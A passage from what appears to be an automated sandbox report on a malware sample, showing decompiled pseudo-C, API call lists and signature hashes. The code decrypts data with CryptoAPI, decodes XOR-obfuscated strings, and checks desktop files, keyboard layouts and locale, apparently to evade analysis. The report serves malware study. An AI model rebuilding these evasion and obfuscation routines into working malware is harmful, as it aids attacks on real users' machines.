							} else {
								goto L7;
							}
						} else {
							GetLastError();
							_t145 = _t149 | 0xffffffff;
						}
					}
				}
				_t135 = _a28;
				if(_t135 < 0x10) {
					L20:
					 *[fs:0x0] = _v16;
					_pop(_t146);
					_pop(_t152);
					_pop(_t118);
					return E0040EB3F(_t145, _t118, _v24 ^ _t155, _t135, _t146, _t152);
				} else {
					_t126 = _a8;
					_t135 = _t135 + 1;
					_t82 = _t126;
					if(_t135 < 0x1000) {
						L19:
						_push(_t135);
						E0040ED7F(_t126);
						goto L20;
					} else {
						_t126 =  *((intOrPtr*)(_t126 - 4));
						_t135 = _t135 + 0x23;
						if(_t82 - _t126 + 0xfffffffc > 0x1f) {
							E004134A7(_t117, _t135, __eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t155);
							_push(_t151);
							_t153 = _t126;
							asm("xorps xmm0, xmm0");
							 *_t153 = 0x42e2d4;
							asm("movq [eax], xmm0");
							__eflags = _v220 + 4;
							E0040FEF1(_v220 + 4, _t153 + 4);
							 *_t153 = 0x42e320;
							return _t153;
						} else {
							goto L19;
						}
					}
				}
			}

0x00403787
0x0040378c
0x0040378e
0x00403798
0x0040379e
0x004037a0
0x004037a6
0x004037af
0x004037b5
0x004037cc
0x004037d6
0x004037ed
0x004037ed
0x004037f0
0x004037f8
0x004038ba
0x004038c8
0x004038ca
0x004037fe
0x004037fe
0x00403814
0x0040381c
0x00000000
0x00403822
0x00403829
0x0040382d
0x0040382f
0x00403835
0x00403838
0x00403838
0x0040383a
0x0040383b
0x0040383b
0x00403846
0x0040385d
0x00403867
0x0040386c
0x0040387e
0x00403886
0x00403896
0x004038b0
0x004038b6
0x004038b8
0x004038d5
0x004038d6
0x004038de
0x004038e8
0x004038f5
0x004038fa
0x00403900
0x00403902
0x00403905
0x0040390b
0x00403915
0x0040391f
0x00403925
0x00403927
0x00403932
0x00403934
0x00403934
0x00403936
0x0040393c
0x00403942
0x00403944
0x00403949
0x0040394b
0x0040394d
0x0040394f
0x0040394f
0x00403961
0x00403967
0x0040396c
0x00403992
0x00403994
0x00000000
0x00000000
0x004039ad
0x004039b2
0x004039b8
0x004039bb
0x004039c1
0x004039c9
0x004039d1
0x004039d2
0x004039d8
0x004039da
0x004039e0
0x004039e6
0x004039ec
0x004039f2
0x00000000
0x00000000
0x004039f2
0x00000000
0x004039c1
0x00403942
0x004039f8
0x004039fe
0x00000000
0x00000000
0x00000000
0x00403888
0x00403888
0x0040388e
0x0040388e
0x00403886
0x0040381c
0x00403a04
0x00403a0a
0x00403a34
0x00403a39
0x00403a41
0x00403a42
0x00403a43
0x00403a51
0x00403a0c
0x00403a0c
0x00403a0f
0x00403a10
0x00403a18
0x00403a2a
0x00403a2a
0x00403a2c
0x00000000
0x00403a1a
0x00403a1a
0x00403a1d
0x00403a28
0x00403a52
0x00403a57
0x00403a58
0x00403a59
0x00403a5a
0x00403a5b
0x00403a5c
0x00403a5d
0x00403a5e
0x00403a5f
0x00403a60
0x00403a63
0x00403a64
0x00403a66
0x00403a6d
0x00403a73
0x00403a7a
0x00403a7e
0x00403a86
0x00403a90
0x00000000
0x00000000
0x00000000
0x00403a28
0x00403a18

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,8E1B5714), ref: 004037F0
CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403814
_mbstowcs.LIBCMT ref: 00403867
CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 0040387E
GetLastError.KERNEL32 ref: 00403888
CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 004038B0
GetLastError.KERNEL32 ref: 004038BA
CryptReleaseContext.ADVAPI32(?,00000000), ref: 004038CA
CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 0040398C
CryptDestroyKey.ADVAPI32(?), ref: 004039FE
___std_exception_copy.LIBVCRUNTIME ref: 00403A7E

Strings

Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 004037CC, 00403A63

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease___std_exception_copy_mbstowcs
String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
API String ID: 4265767208-63410773
Opcode ID: 4b5e54351549d0fa9d80cf72fdf3dfba16e71d39c80505573bf208c294678b43
Instruction ID: 4b0c67ec9982085a3f60a525b5453426e780c309f6f51e15e2d9849bb48b43c0
Opcode Fuzzy Hash: 4b5e54351549d0fa9d80cf72fdf3dfba16e71d39c80505573bf208c294678b43
Instruction Fuzzy Hash: E781A071B00218AFEB209F25CC41B9ABBB9FF45304F4081AAF54DE7281DB759E858F55

Uniqueness

Uniqueness Score: -1.00%

Function 00404490 Relevance: 19.9, APIs: 7, Strings: 4, Instructions: 644
fileCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E00404490(void* __ebx, void* __ecx, void* __edx) {
				intOrPtr _v8;
				int _v16;
				int _v24;
				int _v28;
				signed int _v32;
				int _v36;
				int _v40;
				signed int _v44;
				signed int _v48;
				int _v52;
				signed int _v56;
				char _v60;
				char _v64;
				long _v68;
				int _v72;
				signed int _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				long _v88;
				char _v89;
				char _v90;
				char _v92;
				char _v96;
				long _v100;
				int _v104;
				char _v105;
				signed int _v112;
				intOrPtr _v116;
				int _v120;
				long _v124;
				int _v128;
				int _v144;
				char _v308;
				char _v312;
				char _v316;
				struct _WIN32_FIND_DATAA _v412;
				char _v416;
				intOrPtr _v440;
				char _v456;
				signed int _v464;
				intOrPtr _v472;
				intOrPtr _v476;
				intOrPtr _v480;
				int _v560;
				char _v564;
				int _v568;
				char _v576;
				signed int _v584;
				intOrPtr _v1592;
				int _v1600;
				int _v1604;
				long _v1608;
				int _v1612;
				int _v1628;
				struct HKL__* _v2116;
				signed int _v2120;
				int _v2124;
				int _v2160;
				intOrPtr _v2180;
				char _v2188;
				signed int _v2192;
				intOrPtr _v2204;
				intOrPtr _v2208;
				signed int _v2212;
				intOrPtr _v2248;
				intOrPtr _v2252;
				signed int _v2304;
				char _v2554;
				short _v2556;
				int* _v2572;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t300;
				signed int _t301;
				void* _t309;
				int _t310;
				intOrPtr _t313;
				signed int _t320;
				signed int _t321;
				intOrPtr _t324;
				signed int _t325;
				intOrPtr* _t329;
				signed int _t330;
				intOrPtr _t335;
				signed char _t336;
				signed int _t337;
				signed int _t339;
				intOrPtr _t340;
				signed char _t341;
				signed int _t342;
				signed int _t344;
				intOrPtr _t345;
				signed int _t346;
				signed int _t348;
				int _t351;
				signed int _t357;
				signed int _t358;
				signed int _t361;
				int _t364;
				intOrPtr* _t366;
				int _t370;
				int _t372;
				signed int _t378;
				signed int _t379;
				intOrPtr _t381;
				intOrPtr _t390;
				signed int _t396;
				short _t398;
				signed int _t403;
				signed int _t409;
				intOrPtr _t414;
				signed char _t415;
				signed char* _t416;
				void* _t421;
				long _t422;
				intOrPtr _t423;
				int _t424;
				intOrPtr _t428;
				intOrPtr _t429;
				int _t430;
				int _t434;
				void* _t438;
				signed int _t439;
				void* _t445;
				signed int _t455;
				int _t462;
				signed int _t467;
				void* _t478;
				intOrPtr _t482;
				void* _t489;
				signed int _t490;
				void* _t491;
				void* _t495;
				char* _t499;
				int* _t503;
				int _t506;
				long _t508;
				void* _t514;
				void* _t516;
				void* _t518;
				int* _t520;
				signed int _t522;
				int _t523;
				void* _t524;
				signed int _t528;
				signed int _t531;
				intOrPtr* _t537;
				intOrPtr* _t540;
				signed char* _t544;
				intOrPtr* _t548;
				intOrPtr* _t552;
				int _t560;
				signed int _t566;
				int _t568;
				int _t571;
				signed int* _t572;
				signed int _t582;
				intOrPtr* _t583;
				signed int _t589;
				int _t593;
				signed int _t597;
				intOrPtr _t598;
				void* _t602;
				void* _t603;
				char _t604;
				long _t608;
				int _t611;
				void* _t613;
				long _t615;
				long _t616;
				int* _t617;
				int* _t618;
				int* _t619;
				long _t620;
				void* _t621;
				void* _t625;
				signed char* _t626;
				void* _t627;
				void* _t630;
				void* _t631;
				void* _t632;
				int _t633;
				void* _t634;
				int _t635;
				void* _t636;
				signed int _t637;
				void* _t638;
				signed int _t639;
				void* _t640;
				int* _t641;
				void* _t642;
				void* _t643;
				void* _t644;
				void* _t645;
				int _t646;
				signed char* _t647;
				void* _t648;
				void* _t649;
				void* _t650;
				int _t651;
				void* _t652;
				void* _t653;
				signed int _t654;
				void* _t656;
				void* _t657;
				int _t658;
				void* _t661;
				signed int _t664;
				signed int _t667;
				signed int _t670;
				signed int _t672;
				signed int _t674;
				void* _t676;
				signed int _t679;
				void* _t680;
				signed int _t686;
				void* _t687;
				int* _t688;
				int* _t689;
				int* _t690;
				int* _t691;
				int* _t692;
				int* _t693;
				signed int _t699;
				signed int _t700;
				void* _t703;
				signed int _t705;

				_push(__ebx);
				_t516 = _t676;
				_t679 = (_t676 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t516 + 4));
				_t664 = _t679;
				_push(0xffffffff);
				_push(0x42c448);
				_push( *[fs:0x0]);
				_push(_t516);
				_t680 = _t679 - 0x188;
				_t300 =  *0x43d054; // 0x8e1b5714
				_t301 = _t300 ^ _t664;
				_v32 = _t301;
				_push(_t643);
				_push(_t632);
				_push(_t301);
				 *[fs:0x0] =  &_v24;
				_v16 = 0;
				asm("xorps xmm0, xmm0");
				asm("movq [ebp-0x20], xmm0");
				_v36 = 0;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_v16 = 1;
				E0040BB10(_t516,  &_v92, __edx, _t632, __ecx);
				_v16 = 2;
				_t610 = _v72;
				_t528 = _v76;
				if(_v72 - _t528 < 2) {
					_v416 = 0;
					E00402990(_t516,  &_v92, _t632, _t643, 2, _v416, "\\*", 2);
				} else {
					_v76 = _t528 + 2;
					_t610 = 0x2a5c;
					_t514 =  >=  ? _v92 :  &_v92;
					 *((short*)(_t514 + _t528)) = 0x2a5c;
					 *((char*)(_t514 + _t528 + 2)) = 0;
				}
				_t308 =  >=  ? _v92 :  &_v92;
				_t309 = FindFirstFileA( >=  ? _v92 :  &_v92,  &_v412); // executed
				_t644 = _t309;
				if(_t644 == 0xffffffff) {
					L16:
					_t310 = _v40;
					_t633 = _v44;
					_v416 = _t310;
					if(_t633 == _t310) {
						L24:
						_t633 = 0;
						goto L25;
					} else {
						while(1) {
							E0040BB10(_t516,  &_v68, _t610, _t633, _t633);
							_t488 =  >=  ?  *((void*)(_t516 + 8)) : _t516 + 8;
							_t644 = _v68;
							_t612 = _v52;
							_t601 =  >=  ? _t644 :  &_v68;
							_t489 = E004028A0( >=  ? _t644 :  &_v68, _v52,  >=  ? _t644 :  &_v68,  >=  ?  *((void*)(_t516 + 8)) : _t516 + 8,  *((intOrPtr*)(_t516 + 0x18)));
							_t680 = _t680 + 0xc;
							_t490 = _v48;
							if(_t489 != 0xffffffff) {
								break;
							}
							if(_t490 < 0x10) {
								L23:
								_t633 = _t633 + 0x18;
								if(_t633 != _v416) {
									continue;
								} else {
									goto L24;
								}
							} else {
								_t63 = _t490 + 1; // 0x11
								_t603 = _t63;
								_t495 = _t644;
								if(_t603 < 0x1000) {
									L22:
									_push(_t603);
									E0040ED7F(_t644);
									_t680 = _t680 + 8;
									goto L23;
								} else {
									_t644 =  *(_t644 - 4);
									_t536 = _t603 + 0x23;
									if(_t495 - _t644 + 0xfffffffc > 0x1f) {
										goto L45;
									} else {
										goto L22;
									}
								}
							}
							goto L158;
						}
						__eflags = _t490 - 0x10;
						if(__eflags < 0) {
							L41:
							_t633 = 1;
							L25:
							_t611 = _v72;
							if(_t611 < 0x10) {
								L29:
								_t531 = _v44;
								_v76 = 0;
								_v72 = 0xf;
								_v92 = 0;
								if(_t531 == 0) {
									L33:
									_t612 =  *(_t516 + 0x1c);
									if(_t612 < 0x10) {
										L43:
										 *[fs:0x0] = _v24;
										_pop(_t634);
										_pop(_t645);
										return E0040EB3F(_t633, _t516, _v32 ^ _t664, _t612, _t634, _t645);
									} else {
										_t536 =  *((intOrPtr*)(_t516 + 8));
										_t612 = _t612 + 1;
										_t313 = _t536;
										if(_t612 < 0x1000) {
											L42:
											_push(_t612);
											E0040ED7F(_t536);
											goto L43;
										} else {
											_t536 =  *((intOrPtr*)(_t536 - 4));
											_t612 = _t612 + 0x23;
											if(_t313 - _t536 + 0xfffffffc > 0x1f) {
												goto L44;
											} else {
												goto L42;
											}
										}
									}
								} else {
									_push(_t531);
									E0040D370(_t531, _v40, _t633, _t644);
									_t644 = _v44;
									_t680 = _t680 + 4;
									_t612 = 0x2aaaaaab * (_v36 - _t644) >> 0x20 >> 2;
									_t478 = _t644;
									_t597 = (0x2aaaaaab * (_v36 - _t644) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v36 - _t644) >> 0x20 >> 2) + ((0x2aaaaaab * (_v36 - _t644) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v36 - _t644) >> 0x20 >> 2)) * 2 << 3;
									if(_t597 < 0x1000) {
										L32:
										_push(_t597);
										E0040ED7F(_t644);
										_t680 = _t680 + 8;
										_v44 = 0;
										_v40 = 0;
										_v36 = 0;
										goto L33;
									} else {
										_t644 =  *(_t644 - 4);
										_t536 = _t597 + 0x23;
										if(_t478 - _t644 + 0xfffffffc > 0x1f) {
											goto L44;
										} else {
											goto L32;
										}
									}
								}
							} else {
								_t598 = _v92;
								_t630 = _t611 + 1;
								_t482 = _t598;
								if(_t630 < 0x1000) {
									L28:
									_push(_t630);
									E0040ED7F(_t598);
									_t680 = _t680 + 8;
									goto L29;
								} else {
									_t536 =  *((intOrPtr*)(_t598 - 4));
									_t612 = _t630 + 0x23;
									if(_t482 -  *((intOrPtr*)(_t598 - 4)) + 0xfffffffc > 0x1f) {
										goto L44;
									} else {
										goto L28;
									}
								}
							}
						} else {
							_t89 = _t490 + 1; // 0x11
							_t602 = _t89;
							_t491 = _t644;
							__eflags = _t602 - 0x1000;
							if(__eflags < 0) {
								L40:
								_push(_t602);
								E0040ED7F(_t644);
								_t680 = _t680 + 8;
								goto L41;
							} else {
								_t644 =  *(_t644 - 4);
								_t536 = _t602 + 0x23;
								__eflags = _t491 - _t644 + 0xfffffffc - 0x1f;
								if(__eflags > 0) {
									goto L45;
								} else {
									goto L40;
								}
							}
						}
					}
				} else {
					_t633 = FindNextFileA;
					goto L5;
					do {
						L6:
						_t604 =  *_t499;
						_t499 = _t499 + 1;
					} while (_t604 != 0);
					E004026C0(_t516,  &_v68,  &(_v412.cFileName), _t499 - _t631);
					_v16 = 3;
					_t503 = _v40;
					if(_t503 == _v36) {
						_push( &_v68);
						_push(_t503);
						E0040CDD0(_t516,  &_v44, _t633, _t644); // executed
						_t610 = _v48;
					} else {
						asm("movups xmm0, [ebp-0x38]");
						 *_t503 = 0;
						_t610 = 0xf;
						_v68 = 0;
						asm("movups [eax], xmm0");
						asm("movq xmm0, [ebp-0x28]");
						asm("movq [eax+0x10], xmm0");
						_v40 = _v40 + 0x18;
					}
					_v16 = 2;
					if(_t610 < 0x10) {
						L14:
						_t506 = FindNextFileA(_t644,  &_v412); // executed
						if(_t506 != 0) {
							L5:
							_t499 =  &(_v412.cFileName);
							_v68 = 0;
							_v52 = 0;
							_t631 = _t499 + 1;
							_v48 = 0xf;
							_v68 = 0;
							goto L6;
						} else {
							FindClose(_t644); // executed
							goto L16;
						}
					} else {
						_t608 = _v68;
						_t610 = _t610 + 1;
						_t508 = _t608;
						if(_t610 < 0x1000) {
							L13:
							_push(_t610);
							E0040ED7F(_t608);
							_t680 = _t680 + 8;
							goto L14;
						} else {
							_t536 =  *((intOrPtr*)(_t608 - 4));
							_t612 = _t610 + 0x23;
							if(_t508 -  *((intOrPtr*)(_t608 - 4)) + 0xfffffffc > 0x1f) {
								L44:
								E004134A7(_t516, _t612, __eflags);
								L45:
								E004134A7(_t516, _t612, __eflags);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t516);
								_t518 = _t680;
								_t686 = (_t680 - 0x00000008 & 0xfffffff8) + 4;
								_push(_t664);
								_v440 =  *((intOrPtr*)(_t518 + 4));
								_t667 = _t686;
								_push(0xffffffff);
								_push(0x42c495);
								_push( *[fs:0x0]);
								_push(_t518);
								_t687 = _t686 - 0x50;
								_t320 =  *0x43d054; // 0x8e1b5714
								_t321 = _t320 ^ _t667;
								_v464 = _t321;
								_push(_t644);
								_push(_t633);
								_push(_t321);
								 *[fs:0x0] =  &_v456;
								_v480 = 0x7c6b7d7b;
								_v476 = 0x68617c7e;
								_v472 = 0x2e6b6267;
								_t635 =  *( *[fs:0x2c]);
								_t324 =  *0x450ecc; // 0x8000000b
								__eflags = _t324 -  *((intOrPtr*)(_t635 + 4));
								if(_t324 >  *((intOrPtr*)(_t635 + 4))) {
									E0040EEC8(_t324, 0x450ecc);
									_t687 = _t687 + 4;
									__eflags =  *0x450ecc - 0xffffffff;
									if(__eflags == 0) {
										asm("movq xmm0, [ebp-0x24]");
										asm("movq [0x450e50], xmm0");
										 *0x450e58 = _v52;
										E0040F1DA(_t536, __eflags, 0x42ce40);
										E0040EE7E(0x450ecc);
										_t687 = _t687 + 8;
									}
								}
								__eflags =  *0x450e5b;
								if( *0x450e5b != 0) {
									_t467 = 0;
									__eflags = 0;
									do {
										 *(_t467 + 0x450e50) =  *(_t467 + 0x450e50) ^ 0x0000002e;
										_t467 = _t467 + 1;
										__eflags = _t467 - 0xc;
									} while (_t467 < 0xc);
								}
								_t537 = 0x450e50;
								_v120 = 0;
								_v104 = 0;
								_v100 = 0xf;
								_v120 = 0;
								_t108 = _t537 + 1; // 0x450e51
								_t613 = _t108;
								do {
									_t325 =  *_t537;
									_t537 = _t537 + 1;
									__eflags = _t325;
								} while (_t325 != 0);
								E004026C0(_t518,  &_v120, 0x450e50, _t537 - _t613);
								_v28 = 0;
								__eflags = _v100 - 0x10;
								_t328 =  >=  ? _v120 :  &_v120;
								_t329 = E00418AE5(_t518, _t635, _t644, _v100 - 0x10,  >=  ? _v120 :  &_v120);
								_t614 = _t329;
								_v88 = 0;
								_t540 = _t329;
								_v72 = 0;
								_t688 = _t687 + 4;
								_v68 = 0xf;
								_v88 = 0;
								_t118 = _t540 + 1; // 0x1
								_t646 = _t118;
								do {
									_t330 =  *_t540;
									_t540 = _t540 + 1;
									__eflags = _t330;
								} while (_t330 != 0);
								E004026C0(_t518,  &_v88, _t614, _t540 - _t646);
								_v28 = 2;
								_t615 = _v100;
								__eflags = _t615 - 0x10;
								if(_t615 < 0x10) {
									L60:
									_t616 = _v68;
									_t543 = _v72;
									_v104 = 0;
									_v100 = 0xf;
									_v120 = 0;
									_push(8);
									_push("\\Desktop");
									__eflags = _t616 - _t543 - 8;
									if(_t616 - _t543 < 8) {
										_v96 = 0;
										_t543 =  &_v88;
										_push(_v96);
										_push(8);
										E00402990(_t518,  &_v88, _t635, _t646);
									} else {
										__eflags = _t616 - 0x10;
										_t130 = _t543 + 8; // 0x8
										_t660 =  >=  ? _v88 :  &_v88;
										_t661 = ( >=  ? _v88 :  &_v88) + _t543;
										_v72 = _t130;
										_push(_t661);
										E00410440();
										_t688 =  &(_t688[3]);
										 *((char*)(_t661 + 8)) = 0;
									}
									_t335 =  *0x450ee0; // 0x8000000c
									_v56 = 0x4b426d6d;
									_v52 = 0x5c4b404f;
									_v89 = 0x2e;
									__eflags = _t335 -  *((intOrPtr*)(_t635 + 4));
									if(_t335 >  *((intOrPtr*)(_t635 + 4))) {
										E0040EEC8(_t335, 0x450ee0);
										_t688 =  &(_t688[1]);
										__eflags =  *0x450ee0 - 0xffffffff;
										if(__eflags == 0) {
											asm("movq xmm0, [ebp-0x20]");
											asm("movq [0x450f24], xmm0");
											 *0x450f2c = _v89;
											E0040F1DA(_t543, __eflags, 0x42ce20);
											E0040EE7E(0x450ee0);
											_t688 =  &(_t688[2]);
										}
									}
									_t336 =  *0x450f2c; // 0x0
									__eflags = _t336;
									if(_t336 != 0) {
										 *0x450f24 =  *0x450f24 ^ 0x0000002e;
										 *0x450f25 =  *0x450f25 ^ 0x0000002e;
										 *0x450f26 =  *0x450f26 ^ 0x0000002e;
										 *0x450f27 =  *0x450f27 ^ 0x0000002e;
										 *0x450f28 =  *0x450f28 ^ 0x0000002e;
										 *0x450f29 =  *0x450f29 ^ 0x0000002e;
										 *0x450f2a =  *0x450f2a ^ 0x0000002e;
										 *0x450f2b =  *0x450f2b ^ 0x0000002e;
										_t455 = _t336 ^ 0x0000002e;
										__eflags = _t455;
										 *0x450f2c = _t455;
									}
									_t689 = _t688 - 0x18;
									_t544 = 0x450f24;
									_t617 = _t689;
									_t142 =  &(_t544[1]); // 0x450f25
									_t647 = _t142;
									 *_t617 = 0;
									_t617[4] = 0;
									_t617[5] = 0xf;
									do {
										_t337 =  *_t544;
										_t544 =  &(_t544[1]);
										__eflags = _t337;
									} while (_t337 != 0);
									E004026C0(_t518, _t617, 0x450f24, _t544 - _t647);
									_t339 = E00404490(_t518,  &_v88, _t617); // executed
									_t690 =  &(_t689[6]);
									_v89 = 0x2e;
									__eflags = _t339;
									_t340 =  *0x450f84; // 0x8000000d
									_v90 = _t339 != 0;
									__eflags = _t340 -  *((intOrPtr*)(_t635 + 4));
									if(_t340 >  *((intOrPtr*)(_t635 + 4))) {
										E0040EEC8(_t340, 0x450f84);
										_t690 =  &(_t690[1]);
										__eflags =  *0x450f84 - 0xffffffff;
										if(__eflags == 0) {
											asm("movaps xmm0, [0x439d60]");
											asm("movups [0x450e8c], xmm0");
											 *0x450e9c = _v89;
											E0040F1DA( &_v88, __eflags, 0x42ce00);
											E0040EE7E(0x450f84);
											_t690 =  &(_t690[2]);
										}
									}
									_t341 =  *0x450e9c; // 0x0
									__eflags = _t341;
									if(_t341 != 0) {
										asm("movups xmm0, [0x450e8c]");
										asm("movaps xmm1, [0x439d20]");
										asm("pxor xmm1, xmm0");
										 *0x450e9c = _t341 ^ 0x0000002e;
										asm("movups [0x450e8c], xmm1");
									}
									_t691 = _t690 - 0x18;
									_t548 = 0x450e8c;
									_t618 = _t691;
									_t150 = _t548 + 1; // 0x450e8d
									_t648 = _t150;
									 *_t618 = 0;
									_t618[4] = 0;
									_t618[5] = 0xf;
									do {
										_t342 =  *_t548;
										_t548 = _t548 + 1;
										__eflags = _t342;
									} while (_t342 != 0);
									E004026C0(_t518, _t618, 0x450e8c, _t548 - _t648);
									_t344 = E00404490(_t518,  &_v88, _t618); // executed
									_t692 =  &(_t691[6]);
									_v48 = 0x2e6d;
									__eflags = _t344;
									_t345 =  *0x450ee4; // 0x8000000e
									_v89 = _t344 != 0;
									__eflags = _t345 -  *((intOrPtr*)(_t635 + 4));
									if(_t345 >  *((intOrPtr*)(_t635 + 4))) {
										E0040EEC8(_t345, 0x450ee4);
										_t692 =  &(_t692[1]);
										__eflags =  *0x450ee4 - 0xffffffff;
										if(__eflags == 0) {
											asm("movaps xmm0, [0x439d90]");
											asm("movups [0x450f54], xmm0");
											 *0x450f64 = _v48;
											E0040F1DA( &_v88, __eflags, 0x42cde0);
											E0040EE7E(0x450ee4);
											_t692 =  &(_t692[2]);
										}
									}
									__eflags =  *0x450f65;
									if( *0x450f65 != 0) {
										asm("movups xmm0, [0x450f54]");
										_t445 = 0x10;
										asm("movaps xmm1, [0x439d20]");
										asm("pxor xmm1, xmm0");
										asm("movups [0x450f54], xmm1");
										do {
											 *(_t445 + 0x450f54) =  *(_t445 + 0x450f54) ^ 0x0000002e;
											_t445 = _t445 + 1;
											__eflags = _t445 - 0x12;
										} while (_t445 < 0x12);
									}
									_t693 = _t692 - 0x18;
									_t552 = 0x450f54;
									_t619 = _t693;
									_t160 = _t552 + 1; // 0x450f55
									_t649 = _t160;
									 *_t619 = 0;
									_t619[4] = 0;
									_t619[5] = 0xf;
									do {
										_t346 =  *_t552;
										_t552 = _t552 + 1;
										__eflags = _t346;
									} while (_t346 != 0);
									E004026C0(_t518, _t619, 0x450f54, _t552 - _t649);
									_t348 = E00404490(_t518,  &_v88, _t619); // executed
									_t688 =  &(_t693[6]);
									__eflags = _t348;
									if(_t348 == 0) {
										L89:
										_t646 = 0;
										__eflags = 0;
									} else {
										__eflags = _v90;
										if(_v90 == 0) {
											goto L89;
										} else {
											__eflags = _v89;
											if(_v89 == 0) {
												goto L89;
											} else {
												_t646 = 1;
											}
										}
									}
									_t620 = _v68;
									__eflags = _t620 - 0x10;
									if(_t620 < 0x10) {
										L94:
										 *[fs:0x0] = _v36;
										_pop(_t636);
										_pop(_t650);
										__eflags = _v44 ^ _t667;
										return E0040EB3F(_t646, _t518, _v44 ^ _t667, _t620, _t636, _t650);
									} else {
										_t560 = _v88;
										_t620 = _t620 + 1;
										_t351 = _t560;
										__eflags = _t620 - 0x1000;
										if(_t620 < 0x1000) {
											L93:
											_push(_t620);
											E0040ED7F(_t560);
											goto L94;
										} else {
											_t560 =  *(_t560 - 4);
											_t620 = _t620 + 0x23;
											__eflags = _t351 - _t560 + 0xfffffffc - 0x1f;
											if(__eflags > 0) {
												goto L96;
											} else {
												goto L93;
											}
										}
									}
								} else {
									_t593 = _v120;
									_t627 = _t615 + 1;
									_t462 = _t593;
									__eflags = _t627 - 0x1000;
									if(_t627 < 0x1000) {
										L59:
										_push(_t627);
										E0040ED7F(_t593);
										_t688 =  &(_t688[2]);
										goto L60;
									} else {
										_t560 =  *(_t593 - 4);
										_t620 = _t627 + 0x23;
										__eflags = _t462 - _t560 + 0xfffffffc - 0x1f;
										if(__eflags > 0) {
											E004134A7(_t518, _t620, __eflags);
											L96:
											E004134A7(_t518, _t620, __eflags);
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											_push(_t518);
											_t520 = _t688;
											_t699 = (_t688 - 0x00000008 & 0xfffffff8) + 4;
											_push(_t667);
											_v560 = _t520[1];
											_t670 = _t699;
											_push(0xffffffff);
											_push(0x42c4f2);
											_push( *[fs:0x0]);
											_push(_t520);
											_t700 = _t699 - 0x630;
											_t357 =  *0x43d054; // 0x8e1b5714
											_t358 = _t357 ^ _t670;
											_v584 = _t358;
											_push(_t646);
											_push(_t635);
											_push(_t358);
											 *[fs:0x0] =  &_v576;
											_t651 = _t560;
											_v2120 = _t651;
											_v2160 = _t651;
											asm("xorps xmm0, xmm0");
											_v2124 = 0;
											asm("movq [esi], xmm0");
											 *(_t651 + 8) = 0;
											 *_t651 = 0;
											 *(_t651 + 4) = 0;
											 *(_t651 + 8) = 0;
											_v568 = 0;
											_v2124 = 1;
											_t361 = GetKeyboardLayoutList(0x400,  &_v2116);
											_t637 = 0;
											_v2120 = _t361;
											__eflags = _t361;
											if(_t361 <= 0) {
												L109:
												 *[fs:0x0] = _v48;
												_pop(_t638);
												_pop(_t652);
												__eflags = _v56 ^ _t670;
												return E0040EB3F(_t651, _t520, _v56 ^ _t670, _t620, _t638, _t652);
											} else {
												do {
													_t364 =  *(_t670 + _t637 * 4 - 0x610) & 0x0000ffff;
													_v1600 = _t364;
													GetLocaleInfoA(_t364, 2,  &_v564, 0x1f4); // executed
													_t366 =  &_v564;
													_v1628 = 0;
													_v1612 = 0;
													_t621 = _t366 + 1;
													_v1608 = 0xf;
													_v1628 = 0;
													do {
														_t566 =  *_t366;
														_t366 = _t366 + 1;
														__eflags = _t566;
													} while (_t566 != 0);
													E004026C0(_t520,  &_v1628,  &_v564, _t366 - _t621);
													_t568 = _v1600;
													_v1604 = _t568;
													_v40 = 1;
													_t370 =  *(_t651 + 4);
													__eflags = _t370 -  *(_t651 + 8);
													if(_t370 ==  *(_t651 + 8)) {
														_push( &_v1628);
														_push(_t370);
														E0040CBC0(_t520, _t651, _t637, _t651);
														_t620 = _v1608;
													} else {
														asm("movups xmm0, [ebp-0x638]");
														_t620 = 0xf;
														_v1628 = 0;
														asm("movups [eax], xmm0");
														asm("movq xmm0, [ebp-0x628]");
														asm("movq [eax+0x10], xmm0");
														 *(_t370 + 0x18) = _t568;
														 *(_t651 + 4) =  *(_t651 + 4) + 0x1c;
													}
													_v40 = 0;
													__eflags = _t620 - 0x10;
													if(_t620 < 0x10) {
														goto L108;
													} else {
														_t571 = _v1628;
														_t620 = _t620 + 1;
														_t372 = _t571;
														__eflags = _t620 - 0x1000;
														if(_t620 < 0x1000) {
															L107:
															_push(_t620);
															E0040ED7F(_t571);
															_t700 = _t700 + 8;
															goto L108;
														} else {
															_t571 =  *(_t571 - 4);
															_t620 = _t620 + 0x23;
															__eflags = _t372 - _t571 + 0xfffffffc - 0x1f;
															if(__eflags > 0) {
																E004134A7(_t520, _t620, __eflags);
																asm("int3");
																_push(_t670);
																_t672 = _t700;
																_push(0xffffffff);
																_push(0x42c535);
																_push( *[fs:0x0]);
																_t703 = _t700 - 0x5c;
																_t378 =  *0x43d054; // 0x8e1b5714
																_t379 = _t378 ^ _t672;
																_v2192 = _t379;
																_push(_t520);
																_push(_t651);
